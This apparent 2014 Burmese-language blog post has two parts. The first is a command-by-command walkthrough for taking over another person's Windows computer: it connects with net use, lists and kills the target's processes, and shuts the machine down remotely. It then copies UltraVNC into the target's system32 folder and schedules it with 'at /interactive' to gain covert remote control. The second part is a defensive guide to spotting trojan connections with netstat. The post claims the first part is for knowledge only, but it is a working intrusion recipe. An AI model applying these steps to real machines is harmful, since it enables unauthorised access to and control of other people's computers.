Apr 1, 2014

net use ( cmd ) ကို အသုံးပြုခြင်း

net use command line ကို အသုံးပြုပြီး သူများကွန်ပျူတာတွေကို ပြောင်းပြစ်နိုင်တဲ့နည်းလမ်းလေးဖြစ်ပါတယ်။
ဒီနည်းကိုအသုံးပြုမယ်ဆိုရင် အခြားကွန်ပျူတာရဲ့ IP, user name သိထားဖို့လိုပါတယ်။ ကွန်ပျူတာရဲ့ IP, user
name တွေကို သိထားပြီးဆိုရင် net use ကို အသုံးပြုပြီး အခြားကွန်ပျူတာရဲ့ run ထားတဲ့ program တွေကို
လှမ်းပိတ်တာတို့လုပ်လို့ရမှာဖြစ်ပါတယ်။ ဒါကြောင့် မသိသေးသောပုဂ္ဂိုလ်များအတွက် နည်းလမ်းသိအောင်ဆိုပြီး ကျနော်
ဒီပို့စ်ကိုတင်လိုက်တာပါ။ နည်းသိအောင်သက်သက်သာဖြစ်ပါတယ်။

ကဲ...အောက်ပါ net use ကိုအသုံးပြုပြီး အခြားကွန်ပျူတာများပြုပြင်နိုင်တဲ့နည်း


ဘာမှမလုပ်ခင် အရင်ဦးဆုံး

ဒီပာာကို cmd မှာအရင်ရိုက်လိုက်ပါ။

net use \\(ip) /u:(accountname)

password တောင်းရင်ရိုက်ပေးလိုက်ပါ။

command successfully ဆိုတာကျလာပါလိမ့်မယ်။

e.g

net use \\1.1.1.1 /u:admin
ပေါ့
ကဲစပြီဘာတွေလုပ်လို့ရမလဲဆိုတာ
အောက်မှာပြထားတယ်နော်။
သူ့စက်မှာ ဘာတွေrun ထားလဲကြည့်မယ်
tasklist /s (ip)
e.g tasklist /s 1.1.1.1
ပါ
သူ့စက်မှာ run ထားတာတွေကိုလှမ်းပိတ်မယ်ဗျာ။
taskkill /s (ip ) /f /im (program name)
e.g taskkill /s 1.1.1.1 /f /im notepad.exe
သူ့စက်ကို လှမ်းပြီးတော့ shutdown ချမယ်။
shutdown -m \\(ip) -s -t 1500 -c "(command)"
e.g shutdown -m \\1.1.1.1 -s -t 1500 -c "bye bye see u later"
ပေါ့။
ပြီးတော့သူ့ဆီကို ကိုယ့်ဘက်ကsoftware လှမ်းrun မယ်။
အဲဒီကောင်ကျတော့အဆင့်များသွားပြီ။
vnc လေးလှမ်းrun မယ်ဆိုပါတော့။
သင့်စက်မှာvnc တင်ပြီးသားဆိုပါတော့။
vnc တင်ထားတဲ့နေရာကိုသွားပြီးတော့
vnc တင်ထားတဲ့နေရာက programfiles ထဲမှာ
ဖြစ်ဖို့များပါတယ် ။
အဲ့ဒီဖိုဒါကိုဒီလိုကူးပါ။
ပာိုဘက်စက်ထဲကို
vnc foldername ကိုultravnc ပဲဆိုပါတော့
သင့်အနေနဲ့cmd နဲ့ c:\program files အောက်ကိုသွားပါ။ဒီအတိုင်းပေါ့
cd c:\program files ဆိုပြီးရိုက်လိုက်ပါ။
ပြီးရင် copy ultravnc \\ip\c$ ပေါ့
e.g copy ultravnc \1.1.1.1\c$
လို့ရိုက်လိုက်ပါ။
1 file(s) copied.
ဆိုတာကျလာပါမယ်ပြီးရင်
copy \\1.1.1.1\c$\ultravnc\winvnc.exe(vncserver exe ကိုဆိုလိုတာပါ။) \\1.1.1.1\c$\system32\winvnc.exe
လို့ရိုက်လိုက်ပါ။
သတိ-1.1.1.1 နေရာမှာတော့ သင်ပာက်မယ့်စက်ရဲ့ အိုင်ပီကိုထည့်ပေါ့နော်။
ပြီးရင်
ဒီcommand နဲ့ run ပါ။
at \\ip time(သူ့စက်ရဲ့ အချိန်ပါ။သူ့စက်ရဲ့ အချိန်ထက် တစ်မိနစ်လောက်စောပြီးတော့ပေးပေါ့နော်။) /interactive programfile
e.g at \\1.1.1.1 1:07am(amနှင့် pm တွေမကျန်ခဲ့ပါစေနဲ့) /interactive "winvnc.exe"(ဒီမှာတော့ vnc ကိုပဲrun ပြလိုက်ပါတယ်။)
အဲ့ဒါဆိုရင်
1:07 am ကျရင် vnc software ကသူ့ဆီမှာ run နေပါလိမ့်မယ်။
အဲ့ဒီအခါကျရင် ကိုယ့်ဆီကနေ လှမ်းပြီးတော့ကလိလို့ရပါလိမ့်မယ်။

SHARE LINK http://www.sawlinux.org/2010/10/net-use-cmd.html

Netstat (CMD) ကိုအသုံးပြုပြီး အန္တရာယ်ပေးသူကိုခြေရာခံနည်း

နည်းပညာပိုင်းဆိုတာ သိသင့်သထိုက်လို့တင်ပြပေးတဲ့သဘောပါ။ ကိုယ့်မှာမသိတာလေးတွေရှိရင် သိလာအောင်။ သိပြီးသားဆိုလည်း ပိုသိလာအောင်ပေါ့။ ကျနော်ကတော့ ဟက်ကင်း၊ဟက်ကာတွေဆို ဘာကိုဘာမှမသိဘူး။ လိုင်း တွေကများတယ်လေ ဘယ်လိုင်းကိုအဓိကထားလိုက်မလဲပေါ့။ ဒါကိုကိုယ့်ကိုသိရမယ်။ အဆင့်မြင့်နည်းပညာတစ်ခု ကိုလိုက်မယ်ဆိုရင် အသက်အရွယ်လဲရှိမယ်။ အားထုတ်ကြိုးပမ်းလဲကောင်းတယ်ဆိုရင် ဒီပညာရပ်ပိုင်းတွေကိုရနိုင် ပါတယ်။ ဒါပေမယ့် ဘယ်ပညာရပ်မဆို အသုံးချတတ်ဖို့ပဲလိုတယ်။ ဒီတော့ပစ်သည်လဲ အတိုင်းတာတစ်ခုထိအကျိုး ရှိပါတယ်။ ဖတ်ကြည့်ပါ။ ရေးရတာပျင်းတာနဲ့ သူများရေးပြီးသားကိုပဲယူသုံးလိုက်တယ်။

မိမိကွန်ပျူတာထဲမှာ ထရိုဂျန် (Trojan) ဒါမှမဟုတ် ဟက်ကာတစ်ယောက်ယောက် ၀င်ရောက်နေမှု ရှိမရှိ အလွယ်တကူ ရှာဖွေ ဖော်ထုတ်နိုင်မယ့် နည်းကောင်းတစ်ခုကို ဒီတစ်ပတ်အိုင်တီဗဟုသုတအဖြစ် ဖော်ပြလိုက်ပါတယ်။
ကွန်ပျူတာမှာ ထရိုဂျန်လို့ခေါ်တဲ့ ကွန်ပျူတာဗိုင်းရပ်စ်ပဲဖြစ်ဖြစ်၊ ဟက်ကာပဲ ဖြစ်ဖြစ် ၀င်ရောက်နေပြီဆိုရင် စက်ဟာ နှေးကွေး လာပါလိမ့်မယ်။

ဘာကြောင့်လဲဆိုတော့ ထရိုဂျန်တွေ၊ ဟက်ကာတွေက မိမိကွန်ပျူတာကနေ မိမိရောက်လိုတဲ့ ကွန်ပျူတာ (သို့မဟုတ်) ဆာဗာတွေ ဆီကို အင်တာနက်ကနေ လှမ်းပြီး ချိတ်ဆက်နေလို့ဖြစ်ပါတယ်။
ဒီလိုဝင်ထွက်နိုင်ဖို့ ၀င်ပေါက်ထွက်ပေါက် (Port) နဲ့ ချိတ်ဆက်မှုလမ်း (Protocol) တစ်ခုခုကို အသုံးပြုရပါတယ်။
အများဆုံး အသုံးပြုတာက Transmission Control Protocol (TCP) ချိတ်ဆက်မှု လမ်းကြောင်းကို အသုံးပြုတတ်ပါတယ်။

ပုံမှန်ဝင်ပေါက်ထွက်ပေါက် နံပါတ်တွေက သုညကနေ 1023 အတွင်းမှာရှိပေမယ့် ထရိုဂျန်နဲ့ တခြားဆော့ဖ်ဝဲတွေက Port 1024 ကနေ 49151 အတွင်းမှာ အသုံးပြုကြပါတယ်။
ဒါကို ဖော်ထုတ်နိုင်ဖို့ ၀င်းဒိုးမှာ အလိုအလျောက်ပါဝင်တဲ့ Netstat Tools ကို အသုံးပြုမှာဖြစ်ပါတယ်။
အရင်ဆုံး အင်တာနက်အသုံးပြုနေရင် Browser အားလုံးနဲ့ Software တွေကို ပိတ်လိုက်ပါ။ Windows Key+R ကိုနှိပ်ပါ။
Run box လေးပေါ်လာပါလိမ့်မယ်။

CMD လို့ရိုက်ထည့်ပြီး Enter နှိပ်ပါ။ Command Prompt ကို ရောက်သွားပါ့မယ်။
အရင်ဆုံး မိမိကွန်ပျူတာကနေ အပြင်ကို ဘာတွေထွက်နေလဲဆိုတာ လေ့လာပါ့မယ်။ Command Prompt မှာ Netstat -a လို့ ရိုက်ထည့်ပြီး Enter ခေါက်လိုက်ပါတယ်။

စာတန်းအရှည်ကြီးထွက်လာပါလိမ့်မယ်။ ပုံမှာကြည့်ပါ။



ဆက်ကြောင်းတစ်ခုဟု မိမိစက်ကနေ အပြင် IP တစ်ခုကို ထွက်နေတာ တွေ့ရပါလိမ့်မယ်။
ကွန်ပျူတာမှာ ဆော့ဖ်ဝဲနဲ့ Browser တွေအကုန်ပိတ်ထားပေမယ့် TCP ဆက်ကြောင်းကနေထွက်နေတာဖြစ်ပါတယ်။
Port တွေကို နံပါတ်နဲ့ မြင်ချင်ရင် Netstat -an လို့ရိုက်ထည့်ပြီး ကြည့်ပါ။



မိမိကွန်ပျူတာမှာရှိတဲ့ ပရိုဂရမ်တစ်ခုခုက အင်တာနက် Connection ယူပြီး အပြင်ကို ထွက်နေသလားသိချင်ရင် Netstat -bn လို့ Command Prompt မှာ ရိုက်ထည့်ပြီး သုံးကြည့်ပါ။

အောက်ဖော်ပြပါပုံမှာ avp.exe ပရိုဂရမ်က အပြင် IP နံပါတ် 74.125.236.85 ကို Port နံပါတ် 443 ကို အသုံးပြုပြီး TCP ဆက်ကြောင်းကနေ ထွက်နေတာဖြစ်ပါတယ်။



ဒါကြောင့် ဘယ်သူတွေ ဘယ်ပရိုဂရမ်တွေက အပြင်ကို အင်တာနက်ကနေတစ်ဆင့် ၀င်နေထွက်နေသလဲဆိုတာ Netstat ကို အသုံးပြုပြီး ရှာဖွေနိုင်ပါကြောင်း ဖော်ပြလိုက်ပါတယ်။

ref : http://thangmuallamka.multiply.com/journal/item/95

Followers